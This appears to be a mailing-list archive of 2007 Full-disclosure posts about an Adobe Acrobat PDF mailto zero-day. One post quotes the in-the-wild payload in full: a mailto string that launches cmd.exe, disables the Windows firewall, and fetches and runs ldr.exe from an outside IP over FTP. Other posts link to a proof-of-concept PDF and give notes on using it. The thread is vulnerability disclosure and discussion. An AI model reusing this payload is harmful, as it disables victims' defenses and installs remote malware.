Re: [Full-disclosure] PDF mailto exploit in the wild

2007-10-23 Thread biz4rre
yes, it try to open: mailt0:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat" PS. mailt0 == mailto PPS. ***k

Re: [Full-disclosure] 0-day PDF exploit

2007-10-16 Thread biz4rre
no, it's my PoC exploit and product of my researching based on public information that pdp given in his blog regards, cyanid-E 2007/10/16, phioust <[EMAIL PROTECTED]>: > > is pdp architect releasing more 0day into the wild without his companies > knowledge? I think this breaks the contract from a

[Full-disclosure] 0-day PDF exploit

2007-10-16 Thread biz4rre
...some additional information about 0day PDF exploit PoC: Please download and open PDF PoC _locally_ in Adobe Acrobat (not in Adobe Acrobat ActiveX control because of some internal restrictions within Adobe ActiveX, it may be bypassed via: http://seclists.org/bugtraq/2007/Oct/0213.html but i didn

[Full-disclosure] 0-day PDF exploit

2007-10-16 Thread biz4rre
Zero day PDF exploit for Adobe Acrobat Link to exploit: Please download and open it locally in Adobe Acrobat (not in Adobe Acrobat ActiveX control): http://security.fedora-hosting.com/0day/pdf/pdf_poc.pdf Description: 0-day proof of concept (PoC) exploit for Adobe Acrobat. Software affecte